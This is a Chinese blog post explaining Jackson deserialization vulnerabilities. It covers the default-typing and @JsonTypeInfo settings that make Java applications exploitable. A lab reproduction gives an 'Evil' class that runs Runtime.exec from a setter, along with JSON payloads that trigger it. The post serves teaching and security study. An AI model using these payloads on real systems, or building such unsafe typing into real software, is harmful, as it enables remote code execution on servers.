jackson反序列化漏洞

于 2024-08-10 21:53:13 发布
阅读量556 收藏 19
点赞数 4
分类专栏: web安全(java) 文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_l_c_q/article/details/141096889
版权

jackson反序列化漏洞


很久没写blog,最近慢慢开始清一下库存

反序列化漏洞触发根因

  1. 使用了危险的类+传入类的参数外部可控
  2. 未使用危险的类+类型和传入类型的参数外部可控

第一种情况取决于开发在类中使用了危险的方法,常见于原生反序列化漏洞;第二种情况常见于允许解析外部传入的危险类所导致的,常见于各类组件

jackson介绍

Jackson 是一款流行的 json 解析器,Spring MVC 的默认 json 解析器便是 Jackson。

Jackson 的核心模块由三部分组成。

  • jackson-core,核心包,提供基于"流模式"解析的相关 API,它包括 JsonPaser 和 JsonGenerator。 Jackson 内部实现正是通过高性能的流模式 API 的 JsonGenerator 和 JsonParser 来生成和解析 json。
  • jackson-annotations,注解包,提供标准注解功能;
  • jackson-databind ,数据绑定包, 提供基于"对象绑定" 解析的相关 API ( ObjectMapper ) 和"树模型" 解析的相关 API (JsonNode);基于"对象绑定" 解析的 API 和"树模型"解析的 API 依赖基于"流模式"解析的 API。

jackson反序列化漏洞关键点

jackson反序列化漏洞是由于将恶意序列化数据反序列化为危险类型所导致的,目前有以下三种场景:

  • DefaultTyping
  • activateDefaultTyping
  • JsonTypeInfo

enableDefaultTyping

示例:

ObjectMapper objectMapper = new ObjectMapper();
objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT);
//objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
//objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_CONCRETE_AND_ARRAYS);
//objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);

DefaultTyping可以指定以下四种类型:

  1. ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT:

    这个选项会将所有的对象都视为java.lang.Object类型进行反序列化。这意味着Jackson会尝试调用任何可用的构造函数或setter方法,而不考虑实际的类型信息。

  2. ObjectMapper.DefaultTyping.NON_CONCRETE:

    这个选项会处理那些不是最终(final)类的所有类,即它可以处理抽象类和接口。

  3. ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE (默认选项):

    这个选项结合了上面两个选项的行为,即处理java.lang.Object类型和非最终类。

  4. ObjectMapper.DefaultTyping.NON_FINAL:

    这个选项会处理所有的非final字段,即使它们所属的类是final的。

activateDefaultTyping

自jackson 2.1.0后,DefaultTyping就被弃用,会推荐使用activateDefaultTyping

示例:

ObjectMapper objectMapper = new ObjectMapper();
objectMapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance, ObjectMapper.DefaultTyping.NON_FINAL,
                        JsonTypeInfo.As.WRAPPER_ARRAY);

activateDefaultTyping可以指定三个参数:

  • PolymorphicTypeValidator ptv:用于处理与多态反序列化一起使用的基于类名的子类型的验证的类的接口:当使用Java类名作为类型标识符时,通过“默认类型”和显式@JsonTypeInfo进行验证。
  • ObjectMapper.DefaultTyping applicability:即DefaultTyping处提到的四种类型
  • com.fasterxml.jackson.annotation.JsonTypeInfo.As includeAs

@JsonTypeInfo

  • @JsonTypeInfo(use = JsonTypeInfo.Id.NONE):不允许指定任何类型
  • @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS):通过@class的方式指定任何类型
  • @JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS):通过@c的方式指定任何类型
  • @JsonTypeInfo(use = JsonTypeInfo.Id.NAME)
  • @JsonTypeInfo(use = JsonTypeInfo.Id.CUSTOM)

漏洞触发场景

  1. 对象类型为Object,就是后续要进行漏洞复现的场景了,以下三种类型均可触发:
    • 使用了activateDefaultTyping
    • 使用了enableDefaultTyping
    • 使用了JsonTypeInfo且
  2. 对象类型不为Object,开发在对象的set方法中进行了危险操作,但开发一般不会这么写

漏洞复现

环境

spring boot 3.3 + jdk17 + jackson 2.17.1

引入依赖

spring boot自带jackson,无需引入依赖,想要判断Jackson版本可以在外部依赖处搜索即可。

注意,指定自带jackson的版本时需要注意一个问题,那就是jackson和spring boot存在依赖冲突,而将spring boot降级又将带来jdk版本不匹配的问题

poc

jackson反序列化漏洞的已验证触发场景:
1、@JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)+对象类型为Object
2、@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)+对象类型为Object
3、objectMapper.activateDefaultTyping(new LaissezFaireSubTypeValidator()) +对象类型为Object

payload示例:{ “name”: “liming”, “age”: 12, “object”: [“com.example.demo.vulnerability.Deserialization.Evil”,{“cmd”:“calc”}]}

activateDefaultTyping

Person成员:

private String name;
private Integer age;
public Object object;

com.example.demo.vulnerability.Deserialization.Evil类:

package com.example.demo.vulnerability.Deserialization;

public class Evil {
    public String cmd;

    public void setCmd(String cmd) {
        this.cmd = cmd;
        try {
            Runtime.getRuntime().exec(cmd);
        }
        catch (Exception e){
            e.printStackTrace();
        }
    }
}

(1)当设置为:

objectMapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance, ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT);

或

objectMapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);

或:
objectMapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance, ObjectMapper.DefaultTyping.NON_CONCRETE_AND_ARRAYS);

或:
objectMapper.activateDefaultTyping(new LaissezFaireSubTypeValidator())

payload为:

{    "name": "liming",    "age": 12,    "object": ["com.example.demo.vulnerability.Deserialization.Evil",{"cmd":"calc"}]}

(2)当设置为:

objectMapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance, ObjectMapper.DefaultTyping.NON_FINAL);

payload为:

[    "com.example.demo.entity.Person",    {    "name": "liming",    "age": 12,    "object": ["com.example.demo.vulnerability.Deserialization.Evil",{"cmd":"calc"}]}]
enableDefaultTyping

在jackson 2.17.1下,虽然被弃用,但仍然可以使用,payload同activateDefaultTyping

JsonTypeInfo

Person成员:

private String name;
private Integer age;
@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
public Object object;

当JsonTypeInfo指定use为JsonTypeInfo.Id.CLASS@JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)时,payload为:

{    "name": "liming",    "age": 12,    "object": ["com.example.demo.vulnerability.Deserialization.Evil",{"cmd":"calc"}]}

如果还在Person上面使用注解JsonTypeInfo.Id.CLASS,则需要使用以下payload:

[    "com.example.demo.entity.Person",    {    "name": "liming",    "age": 12,    "object": ["com.example.demo.vulnerability.Deserialization.Evil",{"cmd":"calc"}]}]

参考

shdwak....sad
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 2995
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
jackson反序列化漏洞分析
m0_38043244的博客
06-01 5801
jackson反序列化漏洞分析
反序列化漏洞例子——jackson反序列化漏洞的调试与分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-30 3537
文章目录反序列化例子漏洞原因漏洞条件enableDefaultTyping@JsonTypeInfo总结调试CVE-2017-7525(基于TemplatesImpl利用链)影响版本利用 Jackson 是用来序列化和反序列化 json 的 Java 的开源框架,Jackson 运行时占用内存比较低,性能比较好,且不依靠除JDK外的其他库。 反序列化例子 举一个jackson进行序列化和反序列化的例子,首先,我的依赖包如下所示: <!-- jackson --> <depe
Jackson 反序列化漏洞
qq_50296568的博客
08-07 864
CVE-2017-7525 是 Jackson 数据绑定库(jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
Jackson反序列化漏洞-spring-boot项目
weixin_40918908的博客
09-01 621
漏洞影响范围:jackson-databind < 2.9.10.6 在升级至版本jackson-databind 2.10.1的时候发现parent中指定了jackson的版本为2.7.0,此时直接依赖pom文件报错 解决办法: 1、升级spring-boot版本到2.2.2(老项目升级完jar包冲突较多) 2、替换parent指定的默认版本 ...
Spring Boot 的用户要注意 Jackson 反序列化漏洞
专业的开发者“讨论”
04-23 3742
对于使用Spring Boot的用户,请注意,当前版本(2.1.7)取决于较旧的易受攻击的jackson-databind 2.9.9软件包。
jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现
weixin_39830200的博客
02-23 415
文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html环境搭建引入jar包:ssrf payload:"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]...
Jackson CVE-2018-19361 反序列化漏洞
王嘟嘟的博客
03-10 411
涉及版本:
java jackson漏洞_小白审计JACKSON反序列化漏洞
weixin_29100399的博客
02-16 1596
1. JACKSON漏洞解析poc代码:main.javaimportcom.fasterxml.jackson.databind.ObjectMapper;importcom.sun.org.apache.xerces.internal.impl.dv.util.Base64;importorg.springframework.util.FileCopyUtils;importjava.io.B...
JAVAJackson反序列化漏洞.docx
07-27
以CVE-2020-10673为例,这是一个针对Jackson库的反序列化漏洞,它影响了Jackson 2.9.2版本。复现该漏洞通常涉及构造特定的JSON输入,利用Jackson反序列化时的弱点,触发恶意行为。在复现过程中,需要设置合适的环境...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
shiro反序列化测试工具.zip
06-04
- 使用安全反序列化库,例如使用Jackson的`@JsonTypeInfo`和`@JsonAutoDetect`注解来限制反序列化行为。 - 对于存储或传输的序列化数据,使用数字签名或哈希校验来验证数据完整性。 - 及时更新Shiro到最新版本...
java反序列化漏洞URLClassLoader利用1
08-08
2. **使用安全反序列化库**:如果必须反序列化,可以使用已经处理了安全性问题的库,比如Google的Protocol Buffers或Jackson的`ObjectMapper`,并配置它们以限制反序列化的类。 3. **限制类加载器的权限**:通过...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
域名安全详解
TechEnthusiast的博客
08-06 177
域名安全是网络安全的重要组成部分,涉及多个方面。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 886
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
【CVE-2024-38077】核弹级Windows RCE漏洞如何自检并修复该漏洞(附批量漏洞检测工具及分析伪代码)
最新发布
m0_62783065的博客
08-09 5796
【CVE-2024-38077】核弹级RCE漏洞如何自检并修复该漏洞(附原文内分析伪代码)
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 494
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值